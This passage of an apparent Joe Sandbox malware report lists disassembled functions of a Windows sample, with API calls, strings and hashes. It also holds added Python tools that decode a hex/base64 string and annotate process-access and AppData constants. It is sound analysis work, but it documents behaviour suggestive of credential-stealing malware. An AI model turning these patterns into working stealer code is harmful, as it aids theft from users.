                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: 72d418c919a61d483875b51f1b21fa552f5290a49fc7ac7e20f4431feb465d9a
                                • Instruction ID: a9b0584d93dd7ad81e2349498a7e361405ee4740e3edf4ab761afc5ad41148b3
                                • Opcode Fuzzy Hash: 72d418c919a61d483875b51f1b21fa552f5290a49fc7ac7e20f4431feb465d9a
                                • Instruction Fuzzy Hash: 1421D8727006504FC720AA5CE840A6AF79BDBA2761B15097FF142CB641DE71DC41CBA9
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006A8883
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA188
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 18b0cac9ec35b9c29dc288b343ecc5742ca12c5b945ea59a2cbcaee6de76c408
                                • Instruction ID: 3e706e08070cef6180e06972dbc79e578e89aaf5bb56407de710926a3a5db7b8
                                • Opcode Fuzzy Hash: 18b0cac9ec35b9c29dc288b343ecc5742ca12c5b945ea59a2cbcaee6de76c408
                                • Instruction Fuzzy Hash: 3531B7B5E005199FCB08DF58C8906AEBBB6EB89350F188269E905EB344DB30AD01CBD1
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C5922
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA188
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 006C5935
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: b0ec07754d96941ce82148d08c4b6959198e8dc8f8b6dd6650dd6e465a75e2de
                                • Instruction ID: 40aa5c23b61546ea90571440f9c03e9876c317f58c153aa5f8869af361636306
                                • Opcode Fuzzy Hash: b0ec07754d96941ce82148d08c4b6959198e8dc8f8b6dd6650dd6e465a75e2de
                                • Instruction Fuzzy Hash: D9112131704A80CBC7218B2CEC00B29B7E3EB92761F150ADEE0D687795D771E881C7A5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,006CA430,000000FF), ref: 006C3D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C3D27
                                • wsprintfA.USER32 ref: 006C3D37
                                  • Part of subcall function 006C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006C71FE
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: the same 16 dump regions listed for the first function above
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 199654da9b16d6d0ab704437e8436ae12ef040e10b2fe616502fa2e5cb884e53
                                • Instruction ID: c8e6bbe2761083651b0c7310479466ceac8d3f9d375b33d6a7d998caa612a1fb
                                • Opcode Fuzzy Hash: 199654da9b16d6d0ab704437e8436ae12ef040e10b2fe616502fa2e5cb884e53
                                • Instruction Fuzzy Hash: FE01D271641B14BFE7105B54EC0AF6ABBB8FB45B62F00421AFA05973D0CBB41D00CBA1
                                APIs
                                • __getptd.LIBCMT ref: 006C9279
                                  • Part of subcall function 006C87FF: __amsg_exit.LIBCMT ref: 006C880F
                                • __amsg_exit.LIBCMT ref: 006C9299
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: the same 16 dump regions listed for the first function above
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: __amsg_exit$__getptd
                                • String ID: Xum$Xum
                                • API String ID: 441000147-2611970071
                                • Opcode ID: e11879c033c52570193586c9c7518403877811b1a99266c4a53b3febed7eef78
                                • Instruction ID: 07d699c6680cd5dc1ed57491bcd067e3b7a80886da91db9d9cfb299110aa1669
                                • Opcode Fuzzy Hash: e11879c033c52570193586c9c7518403877811b1a99266c4a53b3febed7eef78
                                • Instruction Fuzzy Hash: 3301C432D17721ABD761AB689409FBD7353EF00B10F55101DE88467790DB286E41CBEA
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006A8737
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA188
                                  • Part of subcall function 006CA173: std::exception::exception.LIBCMT ref: 006CA1AE
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: the same 16 dump regions listed for the first function above
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 66f568c856c9ba891977430dd777c2c96c802d5a463829602ec71135204686b2
                                • Instruction ID: 511e5cf3fbea89d37fe541c72b51675009adf2500bc67a06e871e1a50c57b23b
                                • Opcode Fuzzy Hash: 66f568c856c9ba891977430dd777c2c96c802d5a463829602ec71135204686b2
                                • Instruction Fuzzy Hash: E6F09A37F000220F8354B43D8D8449EA94796E639033AD769E81AEF399EC70EC829AD4
                                APIs
                                  • Part of subcall function 006C781C: __mtinitlocknum.LIBCMT ref: 006C7832
                                  • Part of subcall function 006C781C: __amsg_exit.LIBCMT ref: 006C783E
                                • ___addlocaleref.LIBCMT ref: 006C8756
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: the same 16 dump regions listed for the first function above
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                • String ID: KERNEL32.DLL$Xum$xtm
                                • API String ID: 3105635775-3974556228
                                • Opcode ID: b86343e5a8fbc6b2ef6629a12399f04af0ac82402a26af7548c957b681bd5468
                                • Instruction ID: 2f4185135e8eaf127bf147c345a80af55197dddb6e82f7dff7a2b2fc27c7c1a8
                                • Opcode Fuzzy Hash: b86343e5a8fbc6b2ef6629a12399f04af0ac82402a26af7548c957b681bd5468
                                • Instruction Fuzzy Hash: A301C871845B009ED760AF75D809B69FBE1EF10320F20891EE1DA576E1CFB4A644CF15
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BE544
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE573
                                • lstrcat.KERNEL32(?,00000000), ref: 006BE581
                                • lstrcat.KERNEL32(?,0133DBA0), ref: 006BE59C
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: the same 16 dump regions listed for the first function above
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 731157dfd64eb14d9d11c012260c5c6e466524e394667ec1fe665822b05b9506
                                • Instruction ID: a652a4e33adc57ddf9381877bb9e4f04f1c19f513dd60e92c5407f8699330c27
                                • Opcode Fuzzy Hash: 731157dfd64eb14d9d11c012260c5c6e466524e394667ec1fe665822b05b9506
                                • Instruction Fuzzy Hash: 9B51B8B5A50118AFC794FB54DC52EEE33BAFB48310F04059DFA1687251EE31AE808F95
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 006C1FDF, 006C1FF5, 006C20B7
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: the same 16 dump regions listed for the first function above
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: 7f3a9e5d094f8a94d9ee6761c2b0f082debe3f68b0d97e862592725c766a1b37
                                • Instruction ID: 31ac89d3cf6a83a1bd79188e51655731b2cedf9115f6e6e8862584e939e95c1a
                                • Opcode Fuzzy Hash: 7f3a9e5d094f8a94d9ee6761c2b0f082debe3f68b0d97e862592725c766a1b37
                                • Instruction Fuzzy Hash: F3212839A1018A8BD720EB35C4A4BFDF767DF80362F84445BCC194B391E336194AD796
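The function above references one string three times (xrefs 006C1FDF, 006C1FF5, 006C20B7) and the report prints it only as space-separated hex bytes. Decoding the hex gives an unpadded base64 string, and decoding that in turn gives the JSON JWT header `{ "typ": "JWT", "alg": "EdDSA" }`. What the sample does with this header is not shown on this page. The following decoder is an added example written for this edit, not part of the Joe Sandbox report or of the sample; the only input is the hex listing exactly as it appears in the record above, and it tolerates the stripped `=` padding that the string carries.

```python
import base64
import binascii
from typing import Optional

# Constructed input: the hex listing as Joe Sandbox prints it in the record above
# (xrefs 006C1FDF, 006C1FF5, 006C20B7).
HEX_DUMP = ("65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 "
            "4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30")


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn a space-separated hex listing into the raw bytes it describes."""
    return bytes.fromhex(dump.replace(" ", ""))


def b64decode_lenient(data: bytes) -> Optional[bytes]:
    """Base64-decode data whose '=' padding may have been stripped.

    Returns None when the input is not valid base64 at all, so a caller can
    run this over every dumped string without guarding each one.
    """
    stripped = data.strip()
    padded = stripped + b"=" * (-len(stripped) % 4)   # restore missing padding
    try:
        return base64.b64decode(padded, validate=True)  # reject non-alphabet bytes
    except (binascii.Error, ValueError):
        return None


def decode_report_string(dump: str) -> dict:
    """Decode one hex-dumped report string, one layer at a time."""
    raw = hexdump_to_bytes(dump)
    inner = b64decode_lenient(raw)
    return {
        "ascii": raw.decode("ascii", errors="replace"),
        "base64_decoded": inner.decode("utf-8", errors="replace") if inner else None,
    }


if __name__ == "__main__":
    for layer, value in decode_report_string(HEX_DUMP).items():
        print(f"{layer:>15}: {value}")
```

The `validate=True` argument matters when this is run over many dumped strings: without it, `b64decode` silently discards non-alphabet bytes and will "decode" plain text into garbage instead of reporting that it is not base64.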
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BEBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BEBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 006BEBF1
                                • lstrcat.KERNEL32(?,0133ED28), ref: 006BEC0C
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: the same 16 dump regions listed for the first function above
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: d06ff6913d7d4a7f505967b5e738494a41e1b5b90e52a114298945a2097037f3
                                • Instruction ID: 5ca91e1e9e6b00c74d6803720fd72b38e6891812c5ea5c8f22cebe7d758c4693
                                • Opcode Fuzzy Hash: d06ff6913d7d4a7f505967b5e738494a41e1b5b90e52a114298945a2097037f3
                                • Instruction Fuzzy Hash: C731D7B1A50119ABCB61FF68EC51BED73B5BF49300F0004ADFA0697250DE309E848F94
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 006C4492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 006C44AD
                                • CloseHandle.KERNEL32(00000000), ref: 006C44B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C44E7
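Each API line in these records carries the argument values the sandbox captured on the stack, and several of them are documented Win32 constants: the `00000410` passed to OpenProcess at 006C4492 is `PROCESS_VM_READ | PROCESS_QUERY_INFORMATION`, the minimum needed for GetModuleFileNameExA to read another process's image path; the `0000001A` passed to SHGetFolderPathA at 006BE544 and 006BEBB4 is `CSIDL_APPDATA`; the `00000104` passed to GetModuleFileNameExA is `MAX_PATH`. The second argument to lstrcat at 006BE59C (`0133DBA0`) and at 006BEC0C (`0133ED28`) lies outside the 006A0000-based image regions listed under Memory Dump Source, so the string appended to the AppData path is built at run time rather than stored in the image. The parser below is an added example written for this edit, not part of the Joe Sandbox report or of the sample: it reads API lines in the exact format printed above, decodes those constants, and flags pointer arguments that fall outside the dumped image. The sample lines are copied from the two records named; the image end address used for that check is an assumption (one page past the highest associated region, 00D38000).

```python
import re
from typing import Optional

# Constructed sample: API lines copied from the records at 006BE544 and 006C4492
# in this report, in the format Joe Sandbox prints them.
SAMPLE = """\
• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BE544
• lstrcpy.KERNEL32(00000000,?), ref: 006BE573
• lstrcat.KERNEL32(?,00000000), ref: 006BE581
• lstrcat.KERNEL32(?,0133DBA0), ref: 006BE59C
• OpenProcess.KERNEL32(00000410,00000000), ref: 006C4492
• GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 006C44AD
• CloseHandle.KERNEL32(00000000), ref: 006C44B4
• lstrcpy.KERNEL32(00000000,?), ref: 006C44E7
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[\w:]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# Win32 constants as defined in the Windows SDK headers.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
CSIDL = {0x00: "CSIDL_DESKTOP", 0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA",
         0x1C: "CSIDL_LOCAL_APPDATA", 0x23: "CSIDL_COMMON_APPDATA",
         0x26: "CSIDL_PROGRAM_FILES"}
MAX_PATH = 0x104

# Image base is the "Offset: 006A0000" from the report; the end is an ASSUMPTION
# (one page past the highest associated dump region, 00D38000).
IMAGE_BASE, IMAGE_END = 0x006A0000, 0x00D39000


def parse_api_line(line: str) -> Optional[dict]:
    """Parse one report API line; None for lines that are not API references."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = []
    for a in (m["args"] or "").split(","):
        a = a.strip()
        if not a:
            continue
        try:
            args.append(int(a, 16))      # stack value captured by the sandbox
        except ValueError:
            args.append(a)               # "?" (unknown) or a literal such as ERROR
    return {"api": m["api"], "module": m["mod"], "args": args,
            "ref": int(m["ref"], 16), "subcall_of": m["sub"]}


def parse_api_lines(text: str) -> list:
    return [c for c in map(parse_api_line, text.splitlines()) if c]


def decode_process_access(mask: int) -> list:
    """Split an OpenProcess access mask into named rights; unknown bits stay hex."""
    names = [n for bit, n in sorted(PROCESS_ACCESS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_ACCESS)
    return names + ([f"0x{leftover:X}"] if leftover else [])


def csidl_name(value: int) -> str:
    # Bits above the low byte are CSIDL_FLAG_* modifiers; the folder id is the low byte.
    return CSIDL.get(value & 0xFF, f"CSIDL_0x{value & 0xFF:02X}")


def annotate(call: dict) -> list:
    """Turn the raw argument values of one call into analyst-readable notes."""
    notes = []
    api, args = call["api"], call["args"]
    if api == "OpenProcess" and args and isinstance(args[0], int):
        notes.append("dwDesiredAccess = " + " | ".join(decode_process_access(args[0])))
    if api.startswith("SHGetFolderPath") and len(args) > 1 and isinstance(args[1], int):
        notes.append("csidl = " + csidl_name(args[1]))
    if api.startswith("GetModuleFileNameEx") and len(args) > 3 and args[3] == MAX_PATH:
        notes.append("nSize = MAX_PATH")
    for i, a in enumerate(args):
        if isinstance(a, int) and a >= 0x10000 and not (IMAGE_BASE <= a < IMAGE_END):
            notes.append(f"arg{i} 0x{a:08X} lies outside the dumped image "
                         f"(run-time built data rather than an image string)")
    return notes


if __name__ == "__main__":
    for call in parse_api_lines(SAMPLE):
        print(f"{call['ref']:08X} {call['api']}.{call['module']} {call['args']}")
        for note in annotate(call):
            print("    ->", note)
```

The same parser works on the "Part of subcall function" sub-bullets, which it records under `subcall_of`, so the lstrcpy of the literal `ERROR` at 006C71FE can be attributed to its caller when a whole report is processed.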
                                 Memory Dump Source
                                 • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: the same 16 dump regions listed for the first function above
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
                                • Opcode ID: 06d196593ec148f2b495ed2a90334936263dcb1fc4ce4f91064293ddc9e9a102
                                • Instruction ID: aea4e845673077b9bb6f2a6188b73bd13ccfe764fa2e58b0f090663662dfb0ad
                                • Opcode Fuzzy Hash: 06d196593ec148f2b495ed2a90334936263dcb1fc4ce4f91064293ddc9e9a102
                                • Instruction Fuzzy Hash: 68F0FCB09026256BE720EB749C49FFABBE9FF14704F144595FA89D7280DFB48C848B90
                                APIs
                                • __getptd.LIBCMT ref: 006C8FDD
                                  • Part of subcall function 006C87FF: __amsg_exit.LIBCMT ref: 006C880F
                                • __getptd.LIBCMT ref: 006C8FF4
                                • __amsg_exit.LIBCMT ref: 006C9002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 006C9026
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 01a42a314458c77f64d00579ab9b2d64c538931915f64c59e04eb2ac0dcb5e13
                                • Instruction ID: 96f705703d6be9a6444b954697a9e6d35eb75c1c2cff9d01b7fd638a955dd163
                                • Opcode Fuzzy Hash: 01a42a314458c77f64d00579ab9b2d64c538931915f64c59e04eb2ac0dcb5e13
                                • Instruction Fuzzy Hash: 56F09632A096109BD7A1BB78680AF7D33A3EF00711F25421EF5556B2D2DF645900EA6E
                                APIs
                                • lstrlen.KERNEL32(------,006A5BEB), ref: 006C731B
                                • lstrcpy.KERNEL32(00000000), ref: 006C733F
                                • lstrcat.KERNEL32(?,------), ref: 006C7349
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: b6bf159a03e7c5c4837219e791cd5100db5955c7be5366b99f1b40e0f708f44f
                                • Instruction ID: 989201bc59bf24b55693707363c350711afaa312fabb74d40084657deb87f165
                                • Opcode Fuzzy Hash: b6bf159a03e7c5c4837219e791cd5100db5955c7be5366b99f1b40e0f708f44f
                                • Instruction Fuzzy Hash: 26F0A5745117429FDB65AF36DC48A26BBFAEF85B01318892EA8DAC7714EB34D8409F10
                                APIs
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1557
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1579
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A159B
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B3422
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B3471
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B3497
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 69679076c241ff88c1fd36da4a5b04fb6bf860791e6d35cb286540c4be3ac675
                                • Instruction ID: 67e514c8e40ba1c22d7cdbad76c9c55764e26575b934f26c4c9172de925d7490
                                • Opcode Fuzzy Hash: 69679076c241ff88c1fd36da4a5b04fb6bf860791e6d35cb286540c4be3ac675
                                • Instruction Fuzzy Hash: E0120EB0B112218FDB28CF19C554BA5B7E6BF44714B19C1AED809CB3A2D776ED82CB44
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 006B7C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 006B7CAF
                                  • Part of subcall function 006B7D40: std::_Xinvalid_argument.LIBCPMT ref: 006B7D58
